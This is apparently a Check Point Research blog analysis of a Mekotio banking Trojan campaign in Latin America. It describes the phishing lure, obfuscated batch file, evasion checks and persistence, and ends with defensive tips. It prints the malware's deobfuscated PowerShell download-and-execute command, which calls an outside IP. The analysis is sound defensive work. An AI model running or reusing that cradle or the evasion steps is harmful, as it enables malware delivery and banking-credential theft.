Mekotio Banker Returns with Improved Stealth and Ancient EncryptionNovember 3, 2021
Research by: Arie Olshtein & Abedalla Hadra
- A banking Trojan called “Mekotio” that targeted Latin America countries in the past, now making a comeback with a change in its infection flow.
- Check Point Research (CPR) detected over 100 attacks in recent weeks using the Trojan’s new technique
- The infection starts out and distributed with a phishing email containing a link to a zip archive or a zip file as an attachment.
- One of the main characteristics of those bankers, such as Mekotio, is the modular attack which gives the attackers the ability to change only a small part of the whole in order to avoid detection.
Mekotio, a modular banking Trojan that targeted Latin American countries, recently made a comeback with a new infection flow. The new campaign started right after the Spanish Civil Guard announced the arrest of 16 people involved with Mekotio distribution in July 2021. It appears that the gang behind the malware were able to narrow the gap quickly and change tactics to avoid detection.
We assume that the main cybercrime groups are operating from Brazil and they collaborated with Spanish gangs to distribute malwares. The arrest stopped the activity of the Spanish gangs but not the main cybercrime groups.
Mekotio’s new infection vector contains these unprecedented elements:
- A stealthier batch file with at least two layers of obfuscation.
- New fileless PowerShell script that runs directly in memory.
- Use of Themida v3 for packing the final DLL payload.
In the last 3 months, we saw approximately 100 attacks use new, simple obfuscation techniques, with the help of a substitution cipher, to hide the first module of the attack. This simple obfuscation technique allows it to go undetected by most of the AntiVirus products.
Figure 1 – Low detection rate of Mekotio batch file on VirusTotal
During July and August, Check Point Threat Prevention Engine detected and blocked a wave of malicious batch files with unique obfuscation patterns. When we looked into it, we saw the following attack flow:
Figure 2 – Mekotio new attack flow
- The infection starts with a phishing email containing a link to a zip archive or a zip file as an attachment. The message lures the victim to download and extract the zip content.
- When the user clicks on the zip content, the batch script is executed.
- The batch script runs a “PowerShell Download Cradles” which downloads and runs a PowerShell script on the memory.
- The PowerShell script:
- Checks if the target is located in Latin America.
- Makes sure it is not running in a virtual machine.
- Sets up persistence in the victim’s operating system.
- Downloads a secondary zip archive.
- The secondary zip archive contains three files:
- AutoHotkey (AHK) interpreter (AutoHotkey is a free, open-source scripting language for Windows that allows users to easily create small to complex scripts for all kinds of tasks).
- Mekotio DLL usually packed with Themida v3.
- AutoHotkey script.
6. Those 3 files are extracted and saved in a new directory on the infected system.
7. The PowerShell script calls the AutoHotkey interpreter to run the AHK script.
8. The AutoHotkey script runs the DLL payload.
9. The DLL contains the main Mekotio banker functionality for actions such as stealing access credentials for electronic banking portals and a password stealer.
10. The stolen data is sent to the C&C server.
Let’s now take a closer look at the malware components.
The phishing email, which is written in Spanish, claims that there is a digital tax receipt pending submission. When the victims click the link in the email, a malicious zip archive is downloaded from a malicious website.
Figure 3 – Phishing email
The batch file extracted from the first zip archive has two layers of obfuscation and often contains a file name which starts with “Contacto”.
Figure 4 – Snippet of the obfuscated batch script
The first layer of the obfuscation is a simple substitution cipher. Substitution ciphers encrypt plaintext by replacing each symbol in the plaintext with the corresponding symbol from the lookup table. The source code of this obfuscation was probably taken from here.
Each batch file contains these two lines:
Figure 5 – Substitution arrays
These lines define the substitution and we can use them to deobfuscate the first layer.
After deobfuscating the first layer, we get another layer of obfuscation:
Figure 6 – Layer 2 of obfuscation
In this layer, slices of the command are saved in different environment variables. The values in lines 4-13 are concatenated, resulting the following command:
powershell.exe -ep bypass -nop -win 1
There is also a PowerShell command saved in the environment variable in the example called “mEeWtg9Pxm” (line 18), which is produced as a result of concatenating letters from the environment variable in the example called “o7cro6vX” (line 3).
The output of executing the lines 3 and 18 is the following PowerShell command:
Putting everything together, the batch file executes the following command:
echo iex(“IEX(New-Object Net.WebClient).DownloadString(‘https://13[.]66.15.167/m/?a=Z0DEXUBSWD7FE45T3JHBMMJXCW3DON98P9LY3SRT’)”); | powershell.exe -ep bypass -nop -win 1
After executing the command, a PowerShell script is downloaded to the memory and is executed.
The first thing the script does is check the location of the infected system using the ipinfo.io service. If the system is not in one of these countries, (Brazil, Chile, Mexico, Spain and Peru), then the attack is terminated.
Figure 7 – Checking the location of the infected system
Next, the script checks if it is running in a virtual machine: it compares the computer model to the strings ‘VMware Virtual Platform’ and ‘Virtual Machine’, and exits if the computer model is one of the above.
Figure 8 – Checking if the computer is a virtual machine
The next thing the script does is to create an empty file, used as a footprint, whose name is the current date. This lets it know if it already ran in the system. If the file already exists, the script stops the execution.
Figure 9 – Footprint file creation
After checking the footprint file, a directory with a random name whose length is 8 is usually created in the ProgramData Directory.
Figure 10 – Creating a new directory
Next, a secondary zip file with a random file name is downloaded to the directory.
Figure 11 – Downloading the zip file
The downloaded zip archive contains three files: Mekotio payload DLL, AutoHotkey interpreter and AutoHotkey script. After downloading the zip archive, the script extracts and renames each file in the zip archive with a random name and saves it in the created directory.
The script checks the size of the extracted files to distinguish between the type and the purpose of the files. The script renames the files, adding the extension according to the detected file type.
Figure 12 – Renaming files from the downloaded zip
After renaming the extracted files, a shortcut to the AutoHotkey is created in the AppData directory. The arguments to the shortcut are the AutoHotkey script and the Mekotio DLL.
An AutoHotkey process is started using the shortcut.
Figure 13 – Creating the shortcut and starting AutoHotkey process
Finally, persistence is gained by adding a new value to the following registry key: “HKCU\Software\Microsoft\Windows\CurrentVersion\Run”
This runs the AutoHotkey with the AHK script and the Mekotio DLL as arguments.
Figure 14 – Adding a new value to the registry
The AHK script uses DllCall to run the 4th exported DLL function. By executing the AutoHotkey script, the DLL looks like part of the AutoHotkey execution. As final payloads, we see the DLL which contains the well-known and well-covered Mekotio Banker.
Banking Trojans are a common malware used in attacks targeting countries in Latin America.
One of the characteristics of those bankers, such as Mekotio, is the modular attack which gives the attackers the ability to change only a small part of the whole in order to avoid detection.
CPR see a lot of old malicious code used for a long time, and yet the attacks manage to stay under the radar of AVs and EDR solutions by changing packers or obfuscation techniques such as a substitution cipher.
Our analysis of this campaign highlights the efforts that attackers make to conceal their malicious intentions, bypass security filtering and trick users. To protect yourself against this type of attack, be suspicious of any email or communication from a familiar brand or organization that asks you to click on a link or open an attached document.
Here are some practical tips to help keep your data safe:
- Beware of lookalike domains, spelling errors in emails or websites, and unfamiliar email senders.
- Be cautious with files received via email from unknown senders, especially if they prompt for a certain action you would not usually do.
- Make sure you are ordering goods from an authentic source. One way to do this is to NOT click on promotional links in emails, and instead, Google your desired retailer and click the link from the Google results page.
- Beware of “special” offers that don’t appear to be reliable or trustworthy purchase opportunities.
- Make sure you do not reuse passwords between different applications and accounts.
Organizations can prevent zero-day attacks with an end-to-end cyber architecture used to block deceptive phishing sites and provide alerts on password reuse in real time. Check Point Infinity is effective because it combines two key ingredients: full convergence across all attack surfaces and all attack vectors, and advanced prevention that can tackle the most sophisticated zero-day phishing and account takeover attacks.
Check Point Threat Emulation provides protection against this threat:
Indicators of Compromise
Links to first zip